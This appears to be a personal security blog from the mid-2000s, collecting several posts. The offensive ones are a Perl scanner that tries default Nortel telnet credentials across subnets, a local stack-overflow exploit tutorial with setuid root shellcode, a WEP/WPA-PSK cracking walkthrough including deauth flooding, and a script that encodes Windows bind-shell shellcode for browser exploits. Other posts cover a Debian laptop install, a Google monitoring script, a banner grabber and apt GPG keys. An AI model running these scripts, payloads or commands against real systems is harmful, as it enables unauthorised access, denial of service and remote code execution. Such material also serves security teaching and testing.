Nortel-Defaults.pl

Well I wrote this a while ago for discovering default username and passwords on Nortel switches. It pretty much can be used for any telnet type device, although I think Cisco may need some more sleep()'s. I know its a dirty script, I needed it fast and figured why not post it. You can change the arrary of user/pass and/or have it go at different subnets and/or change where the switches are and/or scan every ip for a switch. In my case I knew the the octects of the switchs on every subnet.

######################################################################

#!/usr/bin/perl

use	Net::Telnet;


#Nortels default username/passwords
@norteldefault = ('rwa','rw','ro','l3','l2','l1','operator','slbop','slbadmin');

#all switches ip
$top=254;
$bot=126;

#gernerate hosts to test
for($a= 1; $a < 100; $a++){

#creat host for every class we want to scan and push on array
#just comment out blocks you dont want to scan or add more

#192.168.*.1,253
#$temp ="192.1.".$a.".".$top;
#push @hosts,$temp;
#$temp ="192.168.".$a.".".$bot;
#push @hosts,$temp;

#192.1.*.1,253
#$temp ="192.1.".$a.".".$top;
#push @hosts,$temp;
#$temp ="192.1.".$a.".".$bot;
#push @hosts,$temp;


#10.10.*.1,253
$temp ="10.10.".$a.".".$top;
push @hosts,$temp;
$temp ="10.10.".$a.".".$bot;
push @hosts,$temp;
}


#setup telnet
$telnet = new Net::Telnet (Timeout => 3, Errmode => "return");


#main loop to do the fun
foreach $host (@hosts){
	chomp $host;
	if($telnet-> open($host)){
		print "\nConnected to $host";


		foreach $userpass (@norteldefault) {
			chomp $userpass;
			$user = $userpass;
			$pass = %userpass;
			&login;
			sleep (30);	
		};
	}
	else{print "\nCould Not Connect To $host"}
};

####old testing 
#sub conn{
#
#$telnet = new Net::Telnet (Timeout => 3, Errmode => "return");
#if($telnet-> open($host)){
#	$connect=1;
#	&login;
#}
#};

sub login{
print "\nTrying To login with $userpass";
print "\nWaiting 30sec before next guess. prevent susp. and lockouts";
if($telnet -> login($userpass,$userpass)){
	print "\nLogged In With $userpass To $host !!!!";
	print "\nThis has been logged to File!!!!";
}
$telnet -> close;
};

#######################################################################


Reference:
http://search.cpan.org/~jrogers/Net-Telnet-3.03/lib/Net/Telnet.pm

Simple Local Stack Overflow

This is just a beginning document on stack overflows. 
If anyone wants to begin to learn about overflows, this is a good place to start. 
This example is done on Linux x86. So lets get started.

First off, if you have a 2.6 kernel you may have Arjan van de Ven's address space 
randomization patch. This will cause the stack to begin at a random location. 
If you want to find out more information on this check out or google.

http://lwn.net/Articles/121845/

To make things easier for now, lets turn it off.
You can check to see if its on with the following command.

cat /proc/sys/kernel/randomize_va_space
If you get a “1” its on, a “0” means its not. To turn off do the following.

echo 0 > /proc/sys/kernel/randomize_va_space

Ok, now thats off lets make sure we enable core dumps.  
If we were to run the program within gdb we don't really need core dumps but 
it does make it a bit easier with them. To enable, invoke the following.

ulimit -c unlimited

Lets start with a small vulnerable program.

----------------------------vuln.c----------------------------
#include stdio.h //dont forget brackets.couldnt use in post

int main(int argc, char * argv[])
{

char buf[10];

if(argc < 2){
printf("usage : %s buffer\n", argv[0]);
exit(0);
}

strcpy(buf,argv[1]);
printf("sent to buffer : %s \n", buf);

}
----------------------------vuln.c----------------------------

As you can see its a very small program that takes user input and copies it 
with strcpy() unchecked. It only has a buffer of 10 which doesn't take much 
to overflow. So now lets compile and run.

gcc vuln.c -o vul

./vuln
Usage : ./vuln buffer

./vuln AAAAA
sent to buffer: AAAAA

Now lets get a segmentation fault.  A seg fault is basically the OS telling 
the program it is trying to access VMA(Virtual Memory Address) that it does 
not have access to.


./vuln AAAAAAAAAAAAAAAA
sent to buffer : AAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)

We just overflowed the the buffer with 16 “A”'s. Lets take a look in GDB.

gdb -c core ./vuln

Core was generated by `./vuln AAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xa7004141 in ?? ()
(gdb) info register $ebp
ebp            0x41414141       0x41414141
(gdb) i r  $eip
eip            0xa7004141       0xa7004141
(gdb)


As you can see we overwrote ebp(Extended Base Pointer) with 0x41414141 which is 
“AAAA” but we did not fully overwrite eip(Extended Instruction Pointer).
We want to control eip so we can control the flow of the program. 
So lets try it again with some more “A”'s. 

Note: some versions of gcc will actually allocate more memory for the buffer , 
so you may need more to fill. This is just in my case. 

We will do this using perl.

./vuln `perl -e 'print "A" x 20'`
Now look at $ebp and $eip in GDB. We have successfully overwritten both with “A”'s.
(gdb) i r $eip
eip            0x41414141       0x41414141
(gdb) i r $ebp
ebp            0x41414141       0x41414141
(gdb)q 


Now we can control the flow of the program. What we want to do is overwrite $eip 
with an address of our choice. Pointing it to something a bit more useful, 
like some shellcode to drop us a shell. Since this is just a local exploit 
and the buffer is not that big to store a shell we can write a simple eggshell 
to load into memory. 

Below is a small eggshell.

-------------------------------eggshell.c-------------------------------
#include stdio.h //dont forget brackets again
#define NOP 0x90 /* nops , we want to land here */

char shellcode[] =
  "\x6a\x17"                      // push $0x17
  "\x58"                        // pop  %eax
  "\x31\xdb"                    // xor  %ebx, %ebx
  "\xcd\x80"                    // int  $0x80

  "\x31\xd2"                    // xor  %edx, %edx  
  "\x6a\x0b"                    // push $0xb
  "\x58"                        // pop  %eax
  "\x52"                        // push %edx
  "\x68\x2f\x2f\x73\x68"        // push $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push $0x6e69622f
  "\x89\xe3"                    // mov  %esp, %ebx
  "\x52"                        // push %edx
  "\x53"                        // push %ebx
  "\x89\xe1"                    // mov  %esp, %ecx
  "\xcd\x80";                   // int  $0x80

/* This is not my shell code , I got it from milw0rm.com.
Its  setuid(0) + execve("/bin/sh", ["/bin/sh", NULL])
http://www.milw0rm.com/shellcode/1637
*/

int main(void)
{
char egg[512];
puts("loaded eggshell into env");
memset(egg,NOP,512);
memcpy(&egg[512-strlen(shellcode)],shellcode,strlen(shellcode));
setenv("EGG", egg, 1);
putenv(egg);
system("/bin/bash");
return(0);
}
-------------------------------eggshell.c-------------------------------


Now we can compile and load the eggshell.

gcc eggshell.c -o eggshell
./eggshell


Now lets see where we want to point eip to. We want to look for our nopsled we 
created/loaded with our eggshell. The  eggshell loaded the nops + shellcode 
into memory. To find the landing point in memory we turn to gdb again.

gdb -c core ./vuln

(gdb) x/s $esp  //x is short for examine do a “help examine” to find out more 
0xaffff6d0:      "AA"
(gdb) 
0xaffff6d3:      ""
(gdb) 
0xaffff6d4:      "D÷ÿ¯P÷ÿ¯\001"
(gdb) 
..........We keep hitting enter until we see the following........
0xaffff8f2:      "EGG=", '\220' ...
(gdb) 
0xaffff9ba:      '\220' ... //This is where we want to land!
(gdb) 

So 0xaffff9ba is our address to slide down our nops into our shellcode. 
This is what we want to overwrite $eip with. If you wanted to see the whole egg you could do 
something like the following.

echo -n $EGG |hexdump -Cv

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000020  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000030  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000040  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000050  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000060  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000070  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000080  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000090  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000c0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000d0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000e0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000000f0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000100  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000110  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000120  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000130  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000140  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000150  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000160  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000170  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000180  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000190  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001c0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001d0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000001e0  90 6a 17 58 31 db cd 80  31 d2 6a 0b 58 52 68 2f  |.j.X1ÛÍ.1Òj.XRh/|
000001f0  2f 73 68 68 2f 62 69 6e  89 e3 52 53 89 e1 cd 80  |/shh/bin.ãRS.áÍ.|
00000200  f4 2f fd a7                                       |ô/ý§|
00000204


See all of our nops followed by the shellcode?

We now have the address we want to overwrite $eip with. Lets assume we didn't 
know the buffer was only [10] , since we only overwrote it with “A”'s there 
really know way of telling what our offset is. Offset would be your buffer 
minus the address of eip. 

You could do something like so:

perl -e 'print “A”x4 . “B”x4 .”C”x4' and so on....... 

Then you could see what letter actually overwrote eip. We could then calculate the 
offset and just add the eip to it. But thats not to practical
(well for this example its not bad). 
So this is where we turn to metasploit.
 
Metasploit has an nice little perl PatternCreate() function to create a pattern of 
unique 4 byte output. This way we can easily calculate where we overwrote $eip and 
then find our offset. So earlier we know we overwrote $eip with 20 “A”'s. 
Lets create a 20 line string which is unique every 4 bytes. 
The module is located in ~/framework/lib.

perl -e 'use Pex;print Pex::Text::PatternCreate(20)'
Aa0Aa1Aa2Aa3Aa4Aa5Aa

Now lets overflow our vuln.c with that pattern.

./vuln Aa0Aa1Aa2Aa3Aa4Aa5Aa
sent to buffer : Aa0Aa1Aa2Aa3Aa4Aa5Aa 
Segmentation fault (core dumped)

Now lets see what is in $eip. 

(gdb) i r $eip 
eip            0x35614134       0x35614134
(gdb) q

Now metasploit even makes it easier to calculate our offset with the help of 
PatteronOffset.pl located in ~/framework/sdk

We pass it the big-endian address in EIP(which is 0x35614134) 
then the size of our pattern(which is 20). Lets try it out.
 
./patternOffset.pl 0x35614134 20
14

So 14 is our offset! We now know our offset and the address to our shellcode.  
What we want to pass to our vuln.c is 14 chars + our address to the 
shellcode(4 bytes). Which makes it overwrite the $eip pointing to our shellcode.

Since 0xaffff8f2(address to shellcode) is in big-endian and we are on little-endian(x86 architecture) 
we will have to convert the address to little-endian. To do this we break up 
the address in 2 bytes, drop the “0x” and then reverse it. Like so:

af ff f8 f2          //which equals
\xf2\xf8\xff\xaf    //we add the \x so it won't interpret it as ASCII

Now want to send our vuln.c 14 “A”'s + \xf2\xf8\xff\xaf  

./vuln `perl -e 'print "A" x 14'``printf "\xf2\xf8\xff\xaf"`

There we exploited a nice little buffer. You should be in a different shell. 
If you type exit you will go back to your original. If you want better results 
play around with the shellcode. You can find more at milw0rm.com, or write your own.

If anyone sees something I could do better or anything wrong please tell me. 
I would be happy to hear. Or even if you got questions please feel free to ask.
This was just to get you started in overlflows.


Here is my crappy little ASCI art of Virtual Memory, to help visualize it. 
I stole the diagram from a the “Intro To Shellcoding” pdf referenced below.

-----------------------------------------------------------------------------------------
|Shared	        | .text	     | .bss    	| <-------------------------stack	| argc,	|
|Libraries	| _start:    | and     	|              char buf[10][ebp][eip]  	| argv,	|
| 		|	     | heap	|					| envp	|
|		|            |		|					|	|
-----------------------------------------------------------------------------------------

Direction -------------->

- .text segment is the program entry point.
- .bss holds uninitialized data that was declared in the program.
- heap is where the program used malloc().
- stack is at the top of the memory
- arg's is the programs arguments set up by the OS.

References:
http://www.milw0rm.com
http://www.rootsecure.net/content/downloads/pdf/intro_to_shellcoding.pdf>
http://insecure.org/stf/smashstack.txt

Past Defcon Pictures

Past Defcons

defcon 14

defcon14

Cracking WEP / WPA-PSK

Ok, I know there are tons of docs out there on this and it has been done a million times. This is just for my personal reference. I always knew WEP was insecure, I just never did anything about it (found it boring). So on one bored night I decided to find out how long it would take to break into my MAC Filtering/ WEP 128 Bit key network. It took about 1 hour to gather all the IV’s I needed and to crack the key. So here’s how to do it.

First you need aircrack.
http://www.aircrack-ng.org

I will usually find the network I want to attack using Kismet. Then let the fun begin.
Now we can startup airodump-ng to capture all the stuff we need.

airodump-ng -w wepcrack -c 1 wlan0

To save headaches of MAC filtering lets just spoof our MAC to a client that is already connected or one you know is allowed.
(If nobody is connected and MAC filtering is enabled, you are kind of out of luck)

ifconfig wlan0 down
ifconfig wlan0 hw ether FF:31:13:3F:44:55 (client MAC)
ifconfig wlan0 up

There much better, MAC filtering is defeated.

Ok now we are capturing the data with airodump, lets inject some traffic and generate some IV’s. In airodump the data column is the IV’s. For a 64 bit key you need around 300,000 and about 1 million for 128 bit key. But this will vary. On to the injection.

Here is a common ARP-request replay attack, which works pretty well.

Aireplay-ng –3 –b 00:14:BF:18:9F:88 (bssid of AP) -h FF:31:13:3F:44:55 (client) wlan0

You may have to wait a while for the first ARP request to be seen, but once it gets a couple its all down hill from there.

Aireplay-ng will look like below when running.

Saving ARP requests in replay_arp-0727-12134.cap
You must also start airodump to capture replies.
Read 3643 packets (got 3 ARP requests), sent 2537 packets...

Note: If you cannot get any ARP requests, sometimes doing a de-auth on the client will sometimes generate some traffic for you. It is done like below.
(If you want to DOS the client just change the 20 to a 0, this will make it loop rather then run 20 times)

Aireplay-ng –0 20 –a 00:14:BF:18:9F:88 (bssid of AP) –c FF:31:13:3F:44:55 (client) wlan0


Now you have an ARP and are replaying traffic. Now just wait for the IV’s to come in.
Once you have enough IV’s lets crack the .cap file.

At a basic level you can just run it like below. By default it tries to crack a 128 bit key. Sometimes its best to start with a 64 bit key and work your way up. Its all up to you.

aircrack-ng [options] capture_file

Sometimes you will have to play with some options depending on the key. Please refer to aircrack’s site for more explanation. It is very straightforward.

http://www.aircrack-ng.org/doku.php?id=aircrack-ng


That’s it ! Key is broken. Now I will quickly go through WPA-PSK. Basically, the only way I found to attack it is a dictionary attack against the PSK.

The goal here is to capture the 4-way handshake. So do the de-auth as described above to cause the client to deauth and reconnect in hopes of catching the 4-way handshake. Sometimes this will take multiple tries to catch it. What I do is just keep on running aircrack against the active dump file to see if I got a handshake or not.
(You can also run ethereal on the file to see exactly what the handshake looks like just filter by EAPOL)

Once you got it. You can stop capturing traffic.

Now you can run aircrack with the WPA option and point it to your dictionary file. But I had troubles passing my very big dictionary file to it. So I then turned to cowpatty. Very straightforward, run it to see available options.

http://sourceforge.net/projects/cowpatty

Key found! Well I cheated a bit and put my PSK in the middle of the dictionary file.

This basically says that when using WPA-PSK, please people use a very good password. Something that will not be found in a normal dictionary file.

Well pretty simple huh? Almost to simple. Don't need to much brains for this attack.

I am now starting to try to inject traffic with scapy. So if anyone has generated arp’s to wifi with it I would be interested to hear.


Refereneces:
http://sourceforge.net/projects/cowpatty
http://www.aircrack-ng.org/doku.php

Installing Debian on Dell Latitude D510

Well just got one of these things from work. Kind of stinks because my IBM A31 played so nice with linux. So I'm writing this to document this long proces and hopefully someone else doesn't have to reinstall a million times while pulling all their hair out.

First of all booting with the debian-installer with the option “linux26” will not work. These drives are SATA, and the kernel used under that option does not pick it up. So download the stable CD and install it with default options giving you the 2.4 kernel. The 2.4 kernel will pick up the sata as IDE. Ok now we have a base “stable” debian system.

Step 1 (get testing packages):
Add testing to your sources.list (I always add after main - contrib & non-free, that’s your call)

* apt-get update
* apt-get dist-upgrade - This is optional, you can stay on stable if you want or just do it later.

Note:
If you do the dist-upgrade use xserver-xorg for your xserver this has support for the video card “i810”
If you stay on Xfree86 you can use the “vesa” driver but you will not get direct rendering.


Step 2 (install/boot 2.6 kernel):
At the time of writing this, 2.6.15 was new and had built-in support for ipw2200, so that’s what I went with.

* apt-get install linux-image-2.6.15-1-686

Now we have to change some things to point to sda.

Change in /boot/grub/menu.lst
* search for kopt and change to sda
* look for the section the kernel boots and change to sda

Change /boot/grub/device.map
* change the hdc to sda

Change in /etc/fstab
* change the hd’s sd’s
* change the cdrom scd0 (this will be used later)


Step 3 (Get scd0/CDROM working):
We will have to recompile the kernel for this one. So grab the source.
If you have not already you will need to install kernel-package for this way.
You can always comipile the kernel your own way too.

* apt-get install linux-source-2.6.15
* extract kernel in /usr/src and make ln –s linux kernel-source-dir
* now copy current kernel config from /boot/ to /usr/src/linux/.config

You can make other changes but I’m just showing the one for the sata cdrom.

* edit /usr/src/linux/drivers/scsi/libata-core.c and change int atapi_enabled = 0 to =1

Now we compile
* make oldconfig
* make-kpkg --initrd --append-to-version="-devin_ertel_rocks" kernel_image <--hope you dont cp/paste :>

Now install it and boot it. Then mount a cd! You can get rid of your other kernels if you like.

Step 4 (Built-in Wireless – IPW2200):

Since ipw2200 is built in to 2.6.15 all we have to do is drop the firmware in /lib/firmware.
Or you just look in /etc/hotplug/firmware.agent to see where hotplug looks for firmware.

* Download the ipw2200 firmware (at the time I needed 2.4, maybe different now)

http://ipw2200.sourceforge.net/

* Extract it into /lib/firmware

Step 5 (resolution and direct rendering):

Now you will have to do a dist-upgrade for this to work correctly. Not sure what package gets direct rendering (xlibs, new xorg???) but this is the only way it worked for me.

Note:
It does get a better FPS in glxgears and looks a lot crisper but really does not seem to be the
resolution I set. So if anyone sees something I am doing wrong or has other ideas I would love to
hear them.

* apt-get install 915resolution (you can read more about what this does from the links below)
* set your /etc/defaults/915resolution - set how you like(below is how I did it)

MODE=3c
XRESO=1400
YRESO=1050
BIT=32

* /etc/init.d/915resolution start
* edit /etc/X11/xorg.conf
* change your driver to i810 if you haven’t already
* change your screen to 1400x1050
* restart X


Step 6 (Touchpad Driver/Synapatics):
Well I never really liked touchpads, and with the default pointer driver it was terrible in enlightenment(not as bad in gnome).


* Install x-dev, libx11-dev and libxext-dev
* Download The Synapatics driver.
http://freshmeat.net/projects/synaptics/

* extract and make install
* then just follow the instructions in the INSTALL file.

Note:
I changed the speed, it was way to slow at first.
Also, for some reason I would loose the mouse after undocking. To fix this I changed the "ServerLayout" like so:

Section "ServerLayout"
InputDevice "Synaptics Mouse" "AlwaysCore"

* also make the change in the device section

Step 7 (ACPID/lidbtn):
Everytime I would close the lid, it would go either to sleep or standby and it would not recover. So to fix this I configured acpid to just blank the screen.
So add the files below to /etc/acpi. You will need vbetool, this is how I blank the screen.
There is a lot more you can do with acpid but this was the big one for me.

/etc/acpi/lidbtn.sh <--make this +x

-------------------------------------------------------
#!/bin/sh
# /etc/acpi/lidbtn.sh
grep 'open' /proc/acpi/button/lid/LID/state >/dev/null

if [ "x$?" == "x0" ]; then
/usr/sbin/vbetool dpms on
else
/usr/sbin/vbetool dpms off
fi
--------------------------------------------------------

and

/etc/acpi/events/lidbtn

----------------------------
#/etc/acpi/events/lidbtn

event=button[ /]lid
action=/etc/acpi/lidbtn.sh

----------------------------

* Now restart acpid /etc/init.d/acpid restart


Other Things To Do:
* Still would like to get the LED for the wireless to work. I found when compiled into the kernel it was a little to buggy.

* Would like to get ipw2200 in monitor mode. I tried to compile this in,
CONFIG_IPW2200_MONITOR=y but it kept removing it. It seems like newer kernel versions in debian will be enabled. Just like the IPW2100. Any ideas , again would love to hear.

* Get the function keys working good. There is a package called i8kutils , but I have not had much luck with that. I may look into acpi to handle this.

References:
http://ipw2200.sourceforge.net/
http://asl.epfl.ch/~kolski/d505.html
http://www-inf.int-evry.fr/~olberger/weblog/2005/08/24/debian-gnulinux-on-a-dell-latitude-d510-laptop/
http://alpha.uhasselt.be/Research/Algebra/Members/D505.html
http://perso.wanadoo.fr/apoirier/
http://lists.debian.org/debian-kernel/2006/03/msg00614.html
http://clx.digi.com.br/wiki/bin/view/Personal/DellLatitude110L
http://csd.informatik.uni-oldenburg.de/~eagle/acpid.html#sec-4

Monitor Web w/ googs.pl

I wanted a way to monitor the web for certain terms(i.e. leaked info on a company). For example, being able to have an arrary of search terms and operators to query aganist, and then email me a nice little html report. This is the reason for googs.pl.

I used google API to do the querys. I also (although not sure how well it works) append the google operator daterange: which needs the julian date, thus hoping to only return new results that day and only email me if it does find new ones. This way I don't have to look at old stuff all the time or get tons of email. You can comment that feature out if you dont want it. To figure the date I used the perl module Cal::Date which I posted a link below. Then I just set it up in a cronjob to run everyday.

# Devin Ertel
# googs.pl
# 
#!/usr/bin/perl

use strict;     
use SOAP::Lite;
use MIME::Lite;
use Net::SMTP;
use Cal::Date qw(DJM MJD today);

#Get Todays Date
my $date = today();

#convert to julian
my $jul_today= DJM($date);

#Put Your Google API Key Here
my $google_key='your_google_key_here';
     
#Google WSDL File Location
my $google_wsdl = "./GoogleSearch.wsdl";
 
#Put querys here, escape any "'s with \" 
my $query;
my @query = ("company + hacking",
	     "allintext:company + hacking",
             "your querys"
	     );
  

#assign current julian date to query
my $goog_daterange = " + daterange:".$jul_today."-".$jul_today;

#SOAP::Lite instance with GoogleSearch.wsdl.
my $google_soap = SOAP::Lite->service("file:$google_wsdl");
     

#Set Up Mail Vars
my $faddy = 'from_address@blah.com';
my $taddy = 'to_address@blah.com';
my $mail_host = 'your_mail_host';

my $subject = "New Information Posted!";
my $msg_body ="";

#Its Google Time

#Loop Through Array of Querys
foreach $query (@query){
	
	#add daterange: operator to curren query
	my $query_date=$query.$goog_daterange;
	
	my $results = $google_soap -> 
    		doGoogleSearch(
      			$google_key, $query_date , 0, 10, "false", "",  "false",
      			"", "latin1", "latin1"
    		);
	
	# Exit On No Results
	@{$results->{resultElements}} or exit;
     
	# Loop Results and Output to HTML
	foreach my $result (@{$results->{resultElements}}) {
        
        #had to take brackets out for this post for the html breaks and lines
	$msg_body .= "br".
  		      $result->{'title'}."br".
  		      "a href=".$result->{URL}.">".$result->{URL}."/a br".
  		      $result->{snippet}.
		      "
hr";
  		     
	}
}
#Setup Message

my $msg=MIME::Lite->new (
        From => $faddy,
        To => $taddy,
        Subject => $subject,
	Type => 'TEXT/HTML',
	Encoding => 'quoted-printable',
	Data => $msg_body,
)       or die "Could Not Create Msg: $!\n";


#Send Message
MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;

References:
http://freshmeat.net/projects/caldate/
http://www.google.com/apis/
http://search.cpan.org/~yves/MIME-Lite-3.01/lib/MIME/Lite.pm

JSUnescape.pl

With all of the recent browser exploits, I wanted an easy way to encode my shellcode. Now this is not polished by any means and I took the function that encodes it(so don't give me any credit). It was actually developed by Aviv Raff and H D Moore from the Mozilla_Compareto exploit.

Some improvements I would like to do is make the encoded shellcode output a little cleaner and I would like to read the shellcode from a file. As it stands now you have to copy your shellcode into the perl script as a var.

So to do this, write your shellcode or just go to
http://metasploit.com:55555/PAYLOADS
and pick the payload you would want to use. paste into the perl script. (below example is a w32_Bind payload)

#! /usr/local/bin/perl
use strict;

#paste your shellcode below
my $shellcode=
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7f".
"\x3c\x79\x76\x83\xeb\xfc\xe2\xf4\x97\x6a\x79\x76\x7f\x6f\x2c\x20".
"\x28\xb7\x15\x52\x67\xb7\x3c\x4a\xf4\x68\x7c\x0e\x7e\xd6\xf2\x3c".
"\x67\xb7\x23\x56\x7e\xd7\x9a\x44\x36\xb7\x4d\xfd\x7e\xd2\x48\x89".
"\x83\x0d\xb9\xda\x47\xdc\x0d\x71\xbe\xf3\x74\x77\xb8\xd7\x8b\x4d".
"\x03\x18\x6d\x03\x9e\xb7\x23\x52\x7e\xd7\x1f\xfd\x73\x77\xf2\x2c".
"\x63\x3d\x92\xfd\x7b\xb7\x78\x9e\x94\x3e\x48\xb6\x20\x62\x24\x2d".
"\xbd\x34\x79\x28\x15\x0c\x20\x12\xf4\x25\xf2\x2d\x73\xb7\x22\x6a".
"\xf4\x27\xf2\x2d\x77\x6f\x11\xf8\x31\x32\x95\x89\xa9\xb5\xbe\xf7".
"\x93\x3c\x78\x76\x7f\x6b\x2f\x25\xf6\xd9\x91\x51\x7f\x3c\x79\xe6".
"\x7e\x3c\x79\xc0\x66\x24\x9e\xd2\x66\x4c\x90\x93\x36\xba\x30\xd2".
"\x65\x4c\xbe\xd2\xd2\x12\x90\xaf\x76\xc9\xd4\xbd\x92\xc0\x42\x21".
"\x2c\x0e\x26\x45\x4d\x3c\x22\xfb\x34\x1c\x28\x89\xa8\xb5\xa6\xff".
"\xbc\xb1\x0c\x62\x15\x3b\x20\x27\x2c\xc3\x4d\xf9\x80\x69\x7d\x2f".
"\xf6\x38\xf7\x94\x8d\x17\x5e\x22\x80\x0b\x86\x23\x4f\x0d\xb9\x26".
"\x2f\x6c\x29\x36\x2f\x7c\x29\x89\x2a\x10\xf0\xb1\x4e\xe7\x2a\x25".
"\x17\x3e\x79\x67\x23\xb5\x99\x1c\x6f\x6c\x2e\x89\x2a\x18\x2a\x21".
"\x80\x69\x51\x25\x2b\x6b\x86\x23\x5f\xb5\xbe\xf7\x93\x3c\x69\x76".
"\x7f\xb5\x9a\x1c\x7f\x54\x79\x66\x7f\x3c\x2a\x21\x80\x69\x61\xf7".
"\x93\x3c\x7d\x76\x7f\xc3\xaa\x76";


JSUnescape($shellcode);


sub JSUnescape #Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
$idx += 2;
}

print "\n" . $code . "\n";
}


Output should look like the following. All ready for unescape()!


uc92b%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u7f13%u793c%u8376%ufceb%uf4e2%u6a97%u7679%u6f7f%u202c%ub728%u5215%ub767%u4a3c%u68f4%u0e7c%ud67e%u3cf2%ub767%u5623%ud77e%u449a%ub736%ufd4d%ud27e%u8948%u0d83%udab9%udc47%u710d%uf3be%u7774%ud7b8%u4d8b%u1803%u036d%ub79e%u5223%ud77e%ufd1f%u7773%u2cf2%u3d63%ufd92%ub77b%u9e78%u3e94%ub648%u6220%u2d24%u34bd%u2879%u0c15%u1220%u25f4%u2df2%ub773%u6a22%u27f4%u2df2%u6f77%uf811%u3231%u8995%ub5a9%uf7be%u3c93%u7678%u6b7f%u252f%ud9f6%u5191%u3c7f%ue679%u3c7e%uc079%u2466%ud29e%u4c66%u9390%uba36%ud230%u4c65%ud2be%u12d2%uaf90%uc976%ubdd4%uc092%u2142%u0e2c%u4526%u3c4d%ufb22%u1c34%u8928%ub5a8%uffa6%ub1bc%u620c%u3b15%u2720%uc32c%uf94d%u6980%u2f7d%u38f6%u94f7%u178d%u225e%u0b80%u2386%u0d4f%u26b9%u6c2f%u3629%u7c2f%u8929%u102a%ub1f0%ue74e%u252a%u3e17%u6779%ub523%u1c99%u6c6f%u892e%u182a%u212a%u6980%u2551%u6b2b%u2386%ub55f%uf7be%u3c93%u7669%ub57f%u1c9a%u547f%u6679%u3c7f%u212a%u6980%uf761%u3c93%u767d%uc37f%u76aa

webserv-naslgrab.nasl

Well I wanted to get a bit more familiar with NASL (Nessus Attack Scripting Language). I've modified nessus plugins in the past but never really did much with it. I have to say I do like it, pretty easy to do testing with.

I needed a way to check a lot of webservers for their versions, and fast. So figured what the heck let me throw something together with NASL. Now this is just a stand-alone script, it will not work within the nessus framework.
(More docs to work with nessus framework are below)

This just sends a HEAD request to the webserver and greps for the server string.

This also could be easly modified to read from the socket and grab other banners. I found this would work for telnet, ftp ,ssh, etc. but for some reason I could not grab the banner from the webservers I was testing. Hence sending
"HEAD / HTTP/1.0\r\n\r\n"

If you wanted to read right from the socket without sending the HEAD command you could just comment that out and replace name w/ server.

I will be looking into this more, but this was just a quick script to get my feet wet.


#####################################################################
# Name: webserv-naslgrab.nasl #
# Description: A non-intrusive way to grab the web server version #
# by sending opening a socket to 80 and sending a #
# HEAD Request. This can be modified to use other #
# ports. #
# Version: .1 #
# Author : Devin Ertel #
# Usage : nasl -t 192.168.1-155 webserv-naslgrab.nasl #
#####################################################################

#Create tcp socket to port 80
soc = open_sock_tcp(80);

#grab host ip of current box with socket open
hostip=get_host_ip();

#if socket was created
if (soc) {

#create string and send
str = string("HEAD / HTTP/1.0\r\n\r\n");
send(socket:soc, data:str);

#grab data from the socket
name = recv(socket:soc, length:1024);

#grep for the line with server in it
server = egrep(pattern:"Server.*", string : name);

#if grep returns value
if(server){
display(server," On IP ",hostip,"\n");
}

#close socket
close(soc);
}


Links:
http://michel.arboi.free.fr/nasl2ref/
http://www.oreillynet.com/pub/a/security/2004/06/03/nessus_plugins.html
http://www.virtualblueness.net/nasl.html

GPG Signature Checking w/ Debian And Apt 0.6

In new versions of apt. GPG signature checking is enabled by default. This is a good thing, allowing us trust the packages we are installing on our system. But if you recently updgraded apt it will begin to complain about not being able to find the pubkey. It should look something like this.

W: GPG error: http://mirrors.kernel.org testing Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 010908312D230C5F

Now I just recently got sick of seeing this message and decided I should really get this working for security reasons. That being said I am a bit new to this. There are many documents out there on how to get this working, I am just documenting different things I did and found. Hopefully once I fully understand the process I will clean this up.

First, you will need to have a 0.6 version of apt and gnupgp installed.

Once you have that an easy way to try and fix this problem is install the debian-keyring.

